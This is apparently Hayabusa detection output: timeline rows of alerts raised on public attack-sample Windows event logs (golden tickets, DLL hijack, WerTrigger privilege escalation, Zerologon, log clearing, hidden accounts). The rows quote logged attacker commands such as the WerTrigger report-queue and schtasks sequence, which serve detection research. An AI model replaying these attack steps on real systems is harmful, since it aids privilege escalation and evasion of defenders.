0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx -2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx -2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx -2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx -2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx -2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx -2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx -2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx -2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx -2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx 